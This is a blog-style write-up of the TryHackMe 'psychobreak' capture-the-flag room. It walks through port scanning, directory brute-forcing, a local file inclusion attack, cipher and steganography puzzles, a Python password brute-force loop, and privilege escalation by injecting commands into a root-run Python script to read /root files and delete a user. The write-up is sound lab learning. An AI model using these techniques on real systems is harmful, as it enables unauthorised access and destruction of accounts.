This is the my first time joining the hacking game. To be honest, it quite fun actually and learn a lot from this game even though it takes 16 hours to complete. LOL
Link to room : https://tryhackme.com/room/psychobreak
So, lets get started
First need to find how many port open by targeted machine
# nmap 10.10.X.X
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-27 09:18 +08
Nmap scan report for 10.10.X.X
Host is up (0.21s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open httpNmap done: 1 IP address (1 host up) scanned in 29.40 seconds
Now, which OS the target machine is running? lets find out
# nmap -A -Pn -T4 10.10.X.X
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-27 09:27 +08
Nmap scan report for 10.10.X.X
Host is up (0.20s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5a
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| 2048 44:2f:fb:3b:f3:95:c3:c6:df:31:d6:e0:9e:99:92:42 (RSA)
| 256 92:24:36:91:7a:db:62:d2:b9:bb:43:eb:58:9b:50:14 (ECDSA)
|_ 256 34:04:df:13:54:21:8d:37:7f:f8:0a:65:93:47:75:d0 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome To Becon Mental Hospital
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.16 seconds
Done. So, now I know all the info about the machine.
When open the IP at the browser, this page shows up.
The task is to find the key and access the locker room. Hmmm..
There is a hint in the source code. Let dig into it.
Alright, found the key. There is a timer to enter the locker room. Need to be hurry.
There is another blocker. I need to decode this piece of text “Tizmg_nv_zxxvhh_gl_gsv_nzk_kovzhv” and get the key to access the map. It kind of cipher type like Caesar cipher but its not. So I’m thinking using online cipher detector. Its actually Atbash Cipher. So now, I managed to decode it and lets open the map
No 1 and 2 is completed. Now lets see No 3: Safe Heaven
Safe Heaven room shows nothing and Room No 4 is locked. Its need the keeper key. Then, must be something here. The same method use I inspect the page first
The hint ask to search through out this page. Must be hidden directory. I start digging using
dirb at the same time to brute all the directory
# gobuster -w WORDLIST_PATH -u http://10.10.X.X/SafeHeaven/ -t 100
# dirb http://10.10.X.X/SafeHeaven/ WORDLIST_PATH
By using dirbuster brute directory wordlist, I manage to find the hidden page
This page shows up and need to be fast. Need to find where is exactly is this place
There is a hint in the code. Need to use google image and found it.
The keeper key is revealed. Now, can proceed to the room 4: Abandoned Room
Okay.. Creepy ass room over here. Lets go further then
Oh Sh*t, another race against time (The timer can be reset if you refresh the page) . Inspect page to see any hint.
The hint tell there is something called “shell” in the current page. There is no input at all. So, I’m guessing it is some parameter to be pass at the url. I go for LFI attack.
It actually give the list of files. After several attempt, finally get the hidden directory
There is 3 files from the LFI. Replace the url with the first directory found
Tada~~. There is some files showing in directory listing.
To proceed, I need to download and extract
# wget URL_PATH
# unzip helpme.zip
I find out that Table.jpg cannot be preview. Must be wrong extension. I simply run
# file Table.jpg
Table.jpg: Zip archive data, at least v2.0 to extract
Luckily, clearly stated that it is ZIP file. Extract it
# unzip Table.jpg
When hear the
key.wav, it kind of morse code because of “bip bip” sound. So, using online morse code decorder and get the key. After a while, the key is actually show the hint and need to reveal something. There is only 2 files from the
Table.jpg. There must be something hidden from the
Jopesh_Oda.jpg image. So I tried online steganographic decoder and its working.
The message show the credentials to FTP site. Hmm.. interesting..
Crack it Open
So lets dig into the FTP site. By using WinCSP, there is 2 files exists and I downloaded it.
# file program
program: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=294d1f19a085a730da19a6c55788ec08c2187039, stripped
Oh! its executable file. Let’s run it
Hmm.. so the program need 1 parameter.
# ./program hello
hello => Incorrect
Okay, now I now how its work. Need to use the dictionary file given and brute it. Let’s create a simple code using python
with open(DICTIONARY_PATH) as lines:
for password in lines:
output= subprocess.check_output(["./program", password.strip()])
if "incorrect" in output.lower():
print(password.strip()+" is Wrong")
Lets run it
00000 is Wrong
####### => Correct
Decode this => 55 444 3 6 2 66 7777 7 2 7777 7777 9 666 777 3 444 7777 7777 666 7777 8 777 2 66 4 33
Another cipher. Cipher detector also didn’t able to detect what cipher it is. So need to guess is the last choice.
You know what.. This code is take longer than the first one. Haha.. Its actually keypad phone. “abc — def — ghi — jkl — mno — pqrs — tuv — wxyz” dammit.
Go Capture the flag
So, move on the next stage, SSH!
At first, I tried to brute force the server using hydra. It takes hours but failed using 2 different password dictionary. I tried using previous found key as a username and using the decrypted cipher as password
# ssh USERNAME@10.10.X.X
Yay! Success. The first thing I usually do is list all files from the current directory first.
# ls -al
... -rw-rw-r-- 1 kidman kidman 264 Aug 13 2020 .readThis.txt -rw-r--r-- 1 root root 19 Feb 26 16:36 .the_eye.txt -rw-rw-r-- 1 kidman kidman 33 Jul 13 2020 user.txt
Lets see the user.txt.
# cat user.txt
When open the
.readThis.txt , its encrypted but must be a cipher family also. But still don’t know what cipher it used. So I unable to decode it. Hmmm.. But there is something is going on with
.the_eye.txt. I notice that the content is changing after several minutes. First thing in my mind is must be the cron scheduler.
# crontab -e
But nothing is found. So, ineed to brute all the files in the machine to find which file change the
# grep -rs "the_eye" /
And found it. Its a python file with root. Since I don’t know how to reserve shell, I do traditional way. Edit the python file — run command and write to a file to be read
subprocess.call("ls -al /root > root_list_files.txt", shell=True)
Oh.. there is root.txt in it. So..
subprocess.call("cat /root/root.txt > root.txt", shell=True)
Now root.txt is revealed
# cat /root.txt
Lastly, need to delete ruvik. Same process, edit the python file again
subprocess.call("deluser -r ruvik && killall -u ruvik && userdel -f ruvik", shell=True)
Oh yeah~~ We are complete the mission!